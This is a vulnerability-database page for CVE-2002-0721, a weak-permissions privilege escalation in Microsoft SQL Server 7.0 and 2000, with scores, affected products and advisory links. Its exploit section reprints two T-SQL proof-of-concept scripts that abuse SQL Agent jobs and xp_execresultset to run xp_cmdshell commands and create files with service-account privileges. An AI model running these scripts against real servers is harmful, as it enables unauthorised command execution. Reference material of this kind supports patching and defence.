CVE-2002-0721 : Detail

CVE-2002-0721

6.16%V3
Network
2002-08-20
02h00 +00:00
2018-10-12
17h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Microsoft SQL Server 7.0 and 2000 installs with weak permissions for extended stored procedures that are associated with helper functions, which could allow unprivileged users, and possibly remote attackers, to run stored procedures with administrator privileges via (1) xp_execresultset, (2) xp_printstatements, or (3) xp_displayparamstmt.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 10 AV:N/AC:L/Au:N/C:C/I:C/A:C [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 21718

Publication date : 2002-08-14 22h00 +00:00
Author : David Litchfield
EDB Verified : Yes

source: https://www.securityfocus.com/bid/5483/info Microsoft SQL Server 2000 uses an Agent which is responsible for restarting the SQL Server service, replication, and running scheduled jobs. Some of the jobs that the Agent executes have weak permissions, which could allow a user with low permissions to perform actions on the database in the context of the SQL Server Service Account when used in conjunction with the Microsoft SQL Server Extended Stored Procedure Privilege Elevation Vulnerability -- GetSystemOnSQL -- For this to work the SQL Agent should be running. -- Further, you'll need to change SERVER_NAME in -- sp_add_jobserver to the SQL Server of your choice -- -- David Litchfield -- ([email protected]) -- 18th July 2002 USE msdb EXEC sp_add_job @job_name = 'GetSystemOnSQL', @enabled = 1, @description = 'This will give a low privileged user access to xp_cmdshell', @delete_level = 1 EXEC sp_add_jobstep @job_name = 'GetSystemOnSQL', @step_name = 'Exec my sql', @subsystem = 'TSQL', @command = 'exec master..xp_execresultset N''select ''''exec master..xp_cmdshell "dir > c:\agent-job-results.txt"'''''',N''Master''' EXEC sp_add_jobserver @job_name = 'GetSystemOnSQL', @server_name = 'SERVER_NAME' EXEC sp_start_job @job_name = 'GetSystemOnSQL' The following proof of concept code supplied by David Litchfield <[email protected]> will create a file called c:\sqlafc123.txt: -- ArbitraryFileCreate -- For this to work the SQL Agent should be running. -- Further, you'll need to change SERVER_NAME in -- sp_add_jobserver to the SQL Server of your choice -- -- David Litchfield -- ([email protected]) -- 19th August 2002 USE msdb EXEC sp_add_job @job_name = 'ArbitraryFileCreate', @enabled = 1, @description = 'This will create a file called c:\sqlafc123.txt', @delete_level = 1 EXEC sp_add_jobstep @job_name = 'ArbitraryFileCreate', @step_name = 'SQLAFC', @subsystem = 'TSQL', @command = 'select ''hello, this file was created by the SQL Agent.''', @output_file_name = 'c:\sqlafc123.txt' EXEC sp_add_jobserver @job_name = 'ArbitraryFileCreate', @server_name = 'SERVER_NAME' EXEC sp_start_job @job_name = 'ArbitraryFileCreate'

Products Mentioned

Configuraton 0

Microsoft>>Data_engine >> Version 1.0

Microsoft>>Data_engine >> Version 2000

Microsoft>>Sql_server >> Version 7.0

Microsoft>>Sql_server >> Version 7.0

Microsoft>>Sql_server >> Version 7.0

Microsoft>>Sql_server >> Version 7.0

Microsoft>>Sql_server >> Version 7.0

Microsoft>>Sql_server >> Version 2000

Microsoft>>Sql_server >> Version 2000

Microsoft>>Sql_server >> Version 2000

References

http://www.kb.cert.org/vuls/id/939675
Tags : third-party-advisory, x_refsource_CERT-VN
http://www.kb.cert.org/vuls/id/818939
Tags : third-party-advisory, x_refsource_CERT-VN
http://marc.info/?l=ntbugtraq&m=102950792606475&w=2
Tags : mailing-list, x_refsource_NTBUGTRAQ
http://www.kb.cert.org/vuls/id/399531
Tags : third-party-advisory, x_refsource_CERT-VN
http://marc.info/?l=bugtraq&m=102950473002959&w=2
Tags : mailing-list, x_refsource_BUGTRAQ